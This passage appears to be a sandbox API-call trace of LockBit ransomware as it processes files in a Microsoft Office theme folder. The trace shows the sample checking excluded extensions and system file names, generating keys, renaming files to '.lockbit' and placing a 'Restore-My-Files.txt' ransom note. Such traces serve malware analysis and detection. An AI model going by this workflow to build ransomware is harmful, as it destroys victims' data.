(lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.812] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.813] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Median.xml") returned 1 [0195.813] lstrcmpiW (lpString1="ntldr", lpString2="Median.xml") returned 1 [0195.813] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Median.xml") returned 1 [0195.813] lstrcmpiW (lpString1="bootsect.bak", lpString2="Median.xml") returned -1 [0195.813] lstrcmpiW (lpString1="autorun.inf", lpString2="Median.xml") returned -1 [0195.813] lstrcmpiW (lpString1="thumbs.db", lpString2="Median.xml") returned 1 [0195.813] lstrcmpiW (lpString1="iconcache.db", lpString2="Median.xml") returned -1 [0195.814] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.814] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml") returned=".xml" [0195.814] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.814] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.814] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.815] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.815] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.815] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.815] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.815] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.lockbit") returned 84 [0195.815] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\median.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.816] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.816] malloc (_Size=0x40068) returned 0x3df0008 [0195.817] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3821) returned 1 [0195.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.817] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.817] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.817] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.818] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.818] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.818] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.823] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.823] malloc (_Size=0xbe) returned 0x1fa2ed8 [0195.823] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbe, FileInformationClass=0xa) returned 0xc0000008 [0195.823] free (_Block=0x1fa2ed8) [0195.823] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Median.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.823] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.823] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.823] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf4f4cf00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf4f4cf00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe13, dwReserved0=0x0, dwReserved1=0x0, cFileName="Metro.xml", cAlternateFileName="")) returned 1 [0195.823] lstrcmpiW (lpString1=".", lpString2="Metro.xml") returned -1 [0195.823] lstrcmpiW (lpString1="..", lpString2="Metro.xml") returned -1 [0195.823] PathFindExtensionW (pszPath="Metro.xml") returned=".xml" [0195.824] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.824] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.825] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Metro.xml") returned 1 [0195.825] lstrcmpiW (lpString1="ntldr", lpString2="Metro.xml") returned 1 [0195.825] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Metro.xml") returned 1 [0195.825] lstrcmpiW (lpString1="bootsect.bak", lpString2="Metro.xml") returned -1 [0195.825] lstrcmpiW (lpString1="autorun.inf", lpString2="Metro.xml") returned -1 [0195.825] lstrcmpiW (lpString1="thumbs.db", lpString2="Metro.xml") returned 1 [0195.825] lstrcmpiW (lpString1="iconcache.db", lpString2="Metro.xml") returned -1 [0195.826] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.826] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml") returned=".xml" [0195.826] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.826] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.826] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.827] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.827] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.827] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.827] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.lockbit") returned 83 [0195.827] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\metro.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.828] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.828] malloc (_Size=0x40068) returned 0x3df0008 [0195.828] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3603) returned 1 [0195.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.829] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.829] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.829] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.830] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.830] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.830] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.838] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0195.838] malloc (_Size=0xbc) returned 0x1fa2ed8 [0195.838] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xbc, FileInformationClass=0xa) returned 0xc0000008 [0195.838] free (_Block=0x1fa2ed8) [0195.838] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Metro.xml" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts") returned 1 [0195.838] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt") returned 86 [0195.838] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0195.838] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf625fc00, ftCreationTime.dwHighDateTime=0x1cac1e0, ftLastAccessTime.dwLowDateTime=0x618565f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xf625fc00, ftLastWriteTime.dwHighDateTime=0x1cac1e0, nFileSizeHigh=0x0, nFileSizeLow=0xe05, dwReserved0=0x0, dwReserved1=0x0, cFileName="Module.xml", cAlternateFileName="")) returned 1 [0195.838] lstrcmpiW (lpString1=".", lpString2="Module.xml") returned -1 [0195.838] lstrcmpiW (lpString1="..", lpString2="Module.xml") returned -1 [0195.838] PathFindExtensionW (pszPath="Module.xml") returned=".xml" [0195.838] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0195.838] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0195.838] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0195.838] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0195.838] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0195.839] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".lockbit", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Module.xml") returned 1 [0195.840] lstrcmpiW (lpString1="ntldr", lpString2="Module.xml") returned 1 [0195.840] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Module.xml") returned 1 [0195.840] lstrcmpiW (lpString1="bootsect.bak", lpString2="Module.xml") returned -1 [0195.840] lstrcmpiW (lpString1="autorun.inf", lpString2="Module.xml") returned -1 [0195.840] lstrcmpiW (lpString1="thumbs.db", lpString2="Module.xml") returned 1 [0195.840] lstrcmpiW (lpString1="iconcache.db", lpString2="Module.xml") returned -1 [0195.840] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\") returned="" [0195.840] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml") returned=".xml" [0195.840] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0195.840] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0195.840] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0195.841] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0195.842] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.lockbit") returned 84 [0195.842] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml" (normalized: "c:\\program files\\microsoft office\\document themes 14\\theme fonts\\module.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0195.845] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0195.845] malloc (_Size=0x40068) returned 0x3df0008 [0195.845] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3589) returned 1 [0195.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.845] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.845] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0195.845] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0195.846] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0195.846] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0195.846] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0195.861] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\Document Themes 14\\Theme Fonts\\Module.xml.lockbit", 